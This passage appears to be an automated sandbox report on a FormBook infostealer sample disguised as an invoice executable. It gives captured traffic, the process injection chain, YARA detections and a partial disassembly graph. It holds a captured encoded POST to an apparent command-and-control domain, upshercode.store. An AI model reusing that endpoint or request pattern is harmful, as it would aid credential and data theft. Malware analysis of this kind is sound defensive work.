                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
                                  May 23, 2024 15:22:52.054665089 CEST224INData Raw: 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20
                                  Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center;
                                  May 23, 2024 15:22:52.058073997 CEST1236INData Raw: 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 33 43 36 45 42 34 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                                  Data Ascii: background-color: #3C6EB4; font-size: 1.1em; font-weight: bold; color: #fff; margin: 0; padding: 0.5em; border-bottom: 2px solid #294172;
                                  May 23, 2024 15:22:52.058090925 CEST1127INData Raw: 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 53 6f 6d 65 74 68 69 6e 67 20 68 61 73 20 74 72 69 67 67 65 72 65 64 20 6d 69 73 73 69 6e
                                  Data Ascii: <div class="content"> <p>Something has triggered missing webpage on your website. This is the default 404 error page for <strong>nginx</strong> that is distributed with


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  64192.168.2.649770162.240.81.1880
                                  TimestampBytes transferredDirectionData
                                  May 23, 2024 15:22:54.025618076 CEST1791OUTPOST /x98j/ HTTP/1.1
                                  Host: www.upshercode.store
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 1245
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.upshercode.store
                                  Referer: http://www.upshercode.store/x98j/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Raw: 46 4e 50 64 3d 6e 68 5a 35 4a 31 68 63 49 48 72 4b 59 38 58 43 67 2b 55 53 70 2f 4e 71 75 6c 6e 64 6f 49 70 66 59 54 75 34 78 53 66 68 34 6d 56 43 71 66 37 37 38 45 7a 33 4b 6f 2b 56 39 73 6d 78 56 37 46 30 54 43 31 45 38 57 5a 65 55 36 64 55 41 5a 41 37 77 70 6f 37 59 46 73 78 49 76 62 69 2b 30 46 78 79 6e 59 4b 38 63 47 70 35 69 41 6f 63 52 59 61 73 79 53 44 76 44 6e 45 54 77 56 36 7a 52 77 75 4d 47 35 46 41 64 30 70 51 43 68 6a 39 34 30 2b 69 71 2f 6d 48 34 51 43 38 41 42 35 47 61 6e 58 73 2f 67 36 46 55 71 65 78 79 50 79 47 46 73 57 61 36 75 4d 73 62 4b 6a 74 37 39 72 67 56 5a 33 69 44 4d 51 68 4a 58 6c 6d 50 6a 62 70 74 59 4f 47 75 6f 6c 48 36 79 61 6b 6b 43 33 39 57 74 6c 68 34 70 33 39 4f 78 4b 36 52 5a 2f 52 7a 44 47 65 73 71 38 4f 39 46 73 31 59 71 53 6f 35 4d 44 49 63 38 50 4f 66 78 4a 68 31 55 76 64 50 67 6a 62 32 68 61 45 30 46 54 65 64 36 38 45 33 7a 6c 62 33 4c 71 5a 43 48 53 6c 69 67 70 72 61 42 73 64 41 79 39 46 70 73 30 49 68 62 56 42 78 37 52 6c 51 78 76 67 4d 31 78 43 38 62 48 66 [TRUNCATED]
                                  Data Ascii: FNPd=nhZ5J1hcIHrKY8XCg+USp/NqulndoIpfYTu4xSfh4mVCqf778Ez3Ko+V9smxV7F0TC1E8WZeU6dUAZA7wpo7YFsxIvbi+0FxynYK8cGp5iAocRYasySDvDnETwV6zRwuMG5FAd0pQChj940+iq/mH4QC8AB5GanXs/g6FUqexyPyGFsWa6uMsbKjt79rgVZ3iDMQhJXlmPjbptYOGuolH6yakkC39Wtlh4p39OxK6RZ/RzDGesq8O9Fs1YqSo5MDIc8POfxJh1UvdPgjb2haE0FTed68E3zlb3LqZCHSligpraBsdAy9Fps0IhbVBx7RlQxvgM1xC8bHfdDpcoN0z4RgCRZy1C8foQq+0o2eVhIlf5ikKrDs1eJx/gfOm7SqWZtsck7JVxG25SogIvgWg7JUEgHXJWQCbtwwErvtmHhzGApXHd9VHiLsu4Wre83f+KvcHit7MebQ+Bc/Alo2HbX64qyQPc+m2jQFqyMcR8IviQbqB0Z4Iu11b1iW/fLS1CdkptIp3CgCRqZv4HWAUh4pxl3hfAXtAZCgrlBdJs9TVD5FctgsuPGcLnQZfClsrSS3VdvjRyp9GYq3ZXIE73+SQD5vAB2ggkeuX2Ov4Mu0SU8IDz9HJXpAq8LxgAXPO06ZQ4EwzKt2kiNlUwIwj1FygeafuTHNzrFLkmJQpvIr9Gk2zl4pGgPSQB80mekQ7LO/5htOSBA06AcTKMrBXCB4T3iqjSkI4pNobHQ6X/yPsRD32CVJsg/5yA7wMFPdiI4KzBYe19mvzNcN6dHIiQQyVZD3XgMNssmcbI59Iqqs1F7AMczw21XQZfYIJl4d+2IIhQtLknBS2zEv/htz1BEQhWeX2krN7a40bOWJqWSTkA/GmNtUASGkPs1/geW/jEzuwOs2gEiNJFsSTX3MBnfA/2EdRbO4XtyEeTdC41tOlZJKTbp7cir0QKcEVHous5N/Gfwik9V2RrCgjNgHzNzgVNlHmt4SGFQ6Ysepzd4iW2b [TRUNCATED]
                                  May 23, 2024 15:22:54.593547106 CEST1236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.20.1
                                  Date: Thu, 23 May 2024 13:22:54 GMT
                                  Content-Type: text/html
                                  Content-Length: 3650
                                  Connection: close
                                  ETag: "636d2d22-e42"
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
                                  May 23, 2024 15:22:54.594374895 CEST224INData Raw: 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20
                                  Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center;
                                  May 23, 2024 15:22:54.598418951 CEST1236INData Raw: 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 33 43 36 45 42 34 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                                  Data Ascii: background-color: #3C6EB4; font-size: 1.1em; font-weight: bold; color: #fff; margin: 0; padding: 0.5em; border-bottom: 2px solid #294172;
                                  May 23, 2024 15:22:54.598424911 CEST1127INData Raw: 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 53 6f 6d 65 74 68 69 6e 67 20 68 61 73 20 74 72 69 67 67 65 72 65 64 20 6d 69 73 73 69 6e
                                  Data Ascii: <div class="content"> <p>Something has triggered missing webpage on your website. This is the default 404 error page for <strong>nginx</strong> that is distributed with


                                  Statistics

                                  CPU Usage

                                  Click to jump to process

                                  Memory Usage

                                  Click to jump to process

                                  High Level Behavior Distribution

                                  Click to dive into process behavior distribution

                                  Behavior

                                  Click to jump to process

                                  System Behavior

                                  General

                                  Target ID:0
                                  Start time:09:18:19
                                  Start date:23/05/2024
                                  Path:C:\Users\user\Desktop\PI No 20000814C.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\PI No 20000814C.exe"
                                  Imagebase:0xf00000
                                  File size:691'200 bytes
                                  MD5 hash:FDDC263879FBF539B746D116E8429A7F
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:low
                                  Has exited:true

                                  General

                                  Target ID:2
                                  Start time:09:18:20
                                  Start date:23/05/2024
                                  Path:C:\Windows\SysWOW64\svchost.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\PI No 20000814C.exe"
                                  Imagebase:0xcd0000
                                  File size:46'504 bytes
                                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2228247758.0000000000470000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2228247758.0000000000470000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2228534862.0000000002CE0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2228534862.0000000002CE0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2229293264.0000000004000000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2229293264.0000000004000000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                  Reputation:moderate
                                  Has exited:true

                                  General

                                  Target ID:3
                                  Start time:09:18:28
                                  Start date:23/05/2024
                                  Path:C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe"
                                  Imagebase:0xb00000
                                  File size:140'800 bytes
                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4525518993.0000000003490000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4525518993.0000000003490000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                  Reputation:high
                                  Has exited:false

                                  General

                                  Target ID:4
                                  Start time:09:18:29
                                  Start date:23/05/2024
                                  Path:C:\Windows\SysWOW64\cipher.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\SysWOW64\cipher.exe"
                                  Imagebase:0xc00000
                                  File size:39'936 bytes
                                  MD5 hash:EC2B2944AB4480E520A8015A0740E684
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4525395645.0000000004FC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4525395645.0000000004FC0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4518364986.00000000032B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4518364986.00000000032B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4525512009.0000000005000000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4525512009.0000000005000000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                  Reputation:moderate
                                  Has exited:false

                                  General

                                  Target ID:6
                                  Start time:09:18:43
                                  Start date:23/05/2024
                                  Path:C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe"
                                  Imagebase:0xb00000
                                  File size:140'800 bytes
                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4527764176.0000000005230000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4527764176.0000000005230000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                  Reputation:high
                                  Has exited:false

                                  General

                                  Target ID:8
                                  Start time:09:18:55
                                  Start date:23/05/2024
                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                  Imagebase:0x7ff728280000
                                  File size:676'768 bytes
                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Disassembly

                                  Reset < >

                                    Execution Graph

                                    Execution Coverage:4%
                                    Dynamic/Decrypted Code Coverage:1.5%
                                    Signature Coverage:5.2%
                                    Total number of Nodes:2000
                                    Total number of Limit Nodes:182
                                    execution_graph 98252 f27e93 98253 f27e9f __setmode 98252->98253 98289 f2a048 GetStartupInfoW 98253->98289 98255 f27ea4 98291 f28dbc GetProcessHeap 98255->98291 98257 f27efc 98258 f27f07 98257->98258 98374 f27fe3 58 API calls 3 library calls 98257->98374 98292 f29d26 98258->98292 98261 f27f0d 98262 f27f18 __RTC_Initialize 98261->98262 98375 f27fe3 58 API calls 3 library calls 98261->98375 98313 f2d812 98262->98313 98265 f27f27 98266 f27f33 GetCommandLineW 98265->98266 98376 f27fe3 58 API calls 3 library calls 98265->98376 98332 f35173 GetEnvironmentStringsW 98266->98332 98270 f27f32 98270->98266 98272 f27f4d 98273 f27f58 98272->98273 98377 f232f5 58 API calls 3 library calls 98272->98377 98342 f34fa8 98273->98342 98276 f27f5e 98277 f27f69 98276->98277 98378 f232f5 58 API calls 3 library calls 98276->98378 98356 f2332f 98277->98356 98280 f27f71 98281 f27f7c __wwincmdln 98280->98281 98379 f232f5 58 API calls 3 library calls 98280->98379 98362 f0492e 98281->98362 98284 f27f90 98285 f27f9f 98284->98285 98380 f23598 58 API calls _doexit 98284->98380 98381 f23320 58 API calls _doexit 98285->98381 98288 f27fa4 __setmode 98290 f2a05e 98289->98290 98290->98255 98291->98257 98382 f233c7 36 API calls 2 library calls 98292->98382 98294 f29d2b 98383 f29f7c InitializeCriticalSectionAndSpinCount __mtinitlocknum 98294->98383 98296 f29d30 98297 f29d34 98296->98297 98385 f29fca TlsAlloc 98296->98385 98384 f29d9c 61 API calls 2 library calls 98297->98384 98300 f29d39 98300->98261 98301 f29d46 98301->98297 98302 f29d51 98301->98302 98386 f28a15 98302->98386 98304 f29d93 98394 f29d9c 61 API calls 2 library calls 98304->98394 98308 f29d98 98308->98261 98309 f29d72 98309->98304 98310 f29d78 98309->98310 98393 f29c73 58 API calls 4 library calls 98310->98393 98312 f29d80 GetCurrentThreadId 98312->98261 98314 f2d81e __setmode 98313->98314 98406 f29e4b 98314->98406 98316 f2d825 98317 f28a15 __calloc_crt 58 API calls 98316->98317 98318 f2d836 98317->98318 98319 f2d8a1 GetStartupInfoW 98318->98319 98320 f2d841 @_EH4_CallFilterFunc@8 __setmode 98318->98320 98321 f2d9e5 98319->98321 98328 f2d8b6 98319->98328 98320->98265 98322 f2daad 98321->98322 98325 f2da32 GetStdHandle 98321->98325 98327 f2da45 GetFileType 98321->98327 98414 f2a06b InitializeCriticalSectionAndSpinCount 98321->98414 98415 f2dabd RtlLeaveCriticalSection _doexit 98322->98415 98324 f28a15 __calloc_crt 58 API calls 98324->98328 98325->98321 98326 f2d904 98326->98321 98329 f2d938 GetFileType 98326->98329 98413 f2a06b InitializeCriticalSectionAndSpinCount 98326->98413 98327->98321 98328->98321 98328->98324 98328->98326 98329->98326 98333 f35184 98332->98333 98334 f27f43 98332->98334 98455 f28a5d 58 API calls 2 library calls 98333->98455 98338 f34d6b GetModuleFileNameW 98334->98338 98336 f351aa _memmove 98337 f351c0 FreeEnvironmentStringsW 98336->98337 98337->98334 98339 f34d9f _wparse_cmdline 98338->98339 98341 f34ddf _wparse_cmdline 98339->98341 98456 f28a5d 58 API calls 2 library calls 98339->98456 98341->98272 98343 f34fc1 __wsetenvp 98342->98343 98344 f34fb9 98342->98344 98345 f28a15 __calloc_crt 58 API calls 98343->98345 98344->98276 98349 f34fea __wsetenvp 98345->98349 98346 f35041 98347 f22f95 _free 58 API calls 98346->98347 98347->98344 98348 f28a15 __calloc_crt 58 API calls 98348->98349 98349->98344 98349->98346 98349->98348 98350 f35066 98349->98350 98353 f3507d 98349->98353 98457 f34857 58 API calls 2 library calls 98349->98457 98351 f22f95 _free 58 API calls 98350->98351 98351->98344 98458 f29006 IsProcessorFeaturePresent 98353->98458 98355 f35089 98355->98276 98359 f2333b __IsNonwritableInCurrentImage 98356->98359 98358 f23359 __initterm_e 98361 f23378 __cinit __IsNonwritableInCurrentImage 98358->98361 98484 f22f80 98358->98484 98481 f2a711 98359->98481 98361->98280 98363 f04948 98362->98363 98373 f049e7 98362->98373 98364 f04982 74A3C8D0 98363->98364 98519 f235ac 98364->98519 98368 f049ae 98531 f04a5b SystemParametersInfoW SystemParametersInfoW 98368->98531 98370 f049ba 98532 f03b4c 98370->98532 98372 f049c2 SystemParametersInfoW 98372->98373 98373->98284 98374->98258 98375->98262 98376->98270 98380->98285 98381->98288 98382->98294 98383->98296 98384->98300 98385->98301 98388 f28a1c 98386->98388 98389 f28a57 98388->98389 98391 f28a3a 98388->98391 98395 f35446 98388->98395 98389->98304 98392 f2a026 TlsSetValue 98389->98392 98391->98388 98391->98389 98403 f2a372 Sleep 98391->98403 98392->98309 98393->98312 98394->98308 98396 f35451 98395->98396 98401 f3546c 98395->98401 98397 f3545d 98396->98397 98396->98401 98404 f28d68 58 API calls __getptd_noexit 98397->98404 98399 f3547c RtlAllocateHeap 98400 f35462 98399->98400 98399->98401 98400->98388 98401->98399 98401->98400 98405 f235e1 RtlDecodePointer 98401->98405 98403->98391 98404->98400 98405->98401 98407 f29e6f RtlEnterCriticalSection 98406->98407 98408 f29e5c 98406->98408 98407->98316 98416 f29ed3 98408->98416 98410 f29e62 98410->98407 98440 f232f5 58 API calls 3 library calls 98410->98440 98413->98326 98414->98321 98415->98320 98417 f29edf __setmode 98416->98417 98418 f29f00 98417->98418 98419 f29ee8 98417->98419 98425 f29f21 __setmode 98418->98425 98444 f28a5d 58 API calls 2 library calls 98418->98444 98441 f2a3ab 58 API calls 2 library calls 98419->98441 98421 f29eed 98442 f2a408 58 API calls 7 library calls 98421->98442 98424 f29f15 98427 f29f2b 98424->98427 98428 f29f1c 98424->98428 98425->98410 98426 f29ef4 98443 f232df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 98426->98443 98430 f29e4b __lock 58 API calls 98427->98430 98445 f28d68 58 API calls __getptd_noexit 98428->98445 98432 f29f32 98430->98432 98434 f29f57 98432->98434 98435 f29f3f 98432->98435 98447 f22f95 98434->98447 98446 f2a06b InitializeCriticalSectionAndSpinCount 98435->98446 98438 f29f4b 98453 f29f73 RtlLeaveCriticalSection _doexit 98438->98453 98441->98421 98442->98426 98444->98424 98445->98425 98446->98438 98448 f22f9e RtlFreeHeap 98447->98448 98452 f22fc7 _free 98447->98452 98449 f22fb3 98448->98449 98448->98452 98454 f28d68 58 API calls __getptd_noexit 98449->98454 98451 f22fb9 GetLastError 98451->98452 98452->98438 98453->98425 98454->98451 98455->98336 98456->98341 98457->98349 98459 f29011 98458->98459 98464 f28e99 98459->98464 98463 f2902c 98463->98355 98465 f28eb3 _memset __call_reportfault 98464->98465 98466 f28ed3 IsDebuggerPresent 98465->98466 98472 f2a395 SetUnhandledExceptionFilter UnhandledExceptionFilter 98466->98472 98469 f28f97 __call_reportfault 98473 f2c836 98469->98473 98470 f28fba 98471 f2a380 GetCurrentProcess TerminateProcess 98470->98471 98471->98463 98472->98469 98474 f2c840 IsProcessorFeaturePresent 98473->98474 98475 f2c83e 98473->98475 98477 f35b5a 98474->98477 98475->98470 98480 f35b09 5 API calls 2 library calls 98477->98480 98479 f35c3d 98479->98470 98480->98479 98482 f2a714 RtlEncodePointer 98481->98482 98482->98482 98483 f2a72e 98482->98483 98483->98358 98487 f22e84 98484->98487 98486 f22f8b 98486->98361 98488 f22e90 __setmode 98487->98488 98495 f23457 98488->98495 98494 f22eb7 __setmode 98494->98486 98496 f29e4b __lock 58 API calls 98495->98496 98497 f22e99 98496->98497 98498 f22ec8 RtlDecodePointer RtlDecodePointer 98497->98498 98499 f22ea5 98498->98499 98500 f22ef5 98498->98500 98509 f22ec2 98499->98509 98500->98499 98512 f289e4 59 API calls 2 library calls 98500->98512 98502 f22f58 RtlEncodePointer RtlEncodePointer 98502->98499 98503 f22f2c 98503->98499 98507 f22f46 RtlEncodePointer 98503->98507 98514 f28aa4 61 API calls 2 library calls 98503->98514 98504 f22f07 98504->98502 98504->98503 98513 f28aa4 61 API calls 2 library calls 98504->98513 98507->98502 98508 f22f40 98508->98499 98508->98507 98515 f23460 98509->98515 98512->98504 98513->98503 98514->98508 98518 f29fb5 RtlLeaveCriticalSection 98515->98518 98517 f22ec7 98517->98494 98518->98517 98520 f29e4b __lock 58 API calls 98519->98520 98521 f235b7 RtlDecodePointer RtlEncodePointer 98520->98521 98584 f29fb5 RtlLeaveCriticalSection 98521->98584 98523 f049a7 98524 f23614 98523->98524 98525 f23638 98524->98525 98526 f2361e 98524->98526 98525->98368 98526->98525 98585 f28d68 58 API calls __getptd_noexit 98526->98585 98528 f23628 98586 f28ff6 9 API calls __Wcsftime_l 98528->98586 98530 f23633 98530->98368 98531->98370 98533 f03b59 __ftell_nolock 98532->98533 98587 f077c7 98533->98587 98537 f03b8c IsDebuggerPresent 98538 f03b9a 98537->98538 98539 f3d4ad MessageBoxA 98537->98539 98540 f03c73 98538->98540 98542 f3d4c7 98538->98542 98543 f03bb7 98538->98543 98539->98542 98541 f03c7a SetCurrentDirectoryW 98540->98541 98546 f03c87 Mailbox 98541->98546 98811 f07373 59 API calls Mailbox 98542->98811 98673 f073e5 98543->98673 98546->98372 98547 f3d4d7 98552 f3d4ed SetCurrentDirectoryW 98547->98552 98549 f03bd5 GetFullPathNameW 98689 f07d2c 98549->98689 98551 f03c10 98698 f10a8d 98551->98698 98552->98546 98555 f03c2e 98556 f03c38 98555->98556 98812 f64c03 AllocateAndInitializeSid CheckTokenMembership FreeSid 98555->98812 98714 f03a58 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 98556->98714 98560 f3d50a 98560->98556 98563 f3d51b 98560->98563 98562 f03c42 98565 f03c55 98562->98565 98722 f043db 98562->98722 98813 f04864 98563->98813 98733 f10b30 98565->98733 98566 f3d523 98584->98523 98585->98528 98586->98530 98840 f20ff6 98587->98840 98589 f077e8 98590 f20ff6 Mailbox 59 API calls 98589->98590 98591 f03b63 GetCurrentDirectoryW 98590->98591 98592 f03778 98591->98592 98593 f077c7 59 API calls 98592->98593 98594 f0378e 98593->98594 98878 f03d43 98594->98878 98596 f037ac 98597 f04864 61 API calls 98596->98597 98598 f037c0 98597->98598 98599 f07f41 59 API calls 98598->98599 98600 f037cd 98599->98600 98892 f04f3d 98600->98892 98603 f3d3ae 98963 f697e5 98603->98963 98604 f037ee Mailbox 98916 f081a7 98604->98916 98607 f3d3cd 98610 f22f95 _free 58 API calls 98607->98610 98612 f3d3da 98610->98612 98614 f04faa 84 API calls 98612->98614 98616 f3d3e3 98614->98616 98620 f03ee2 59 API 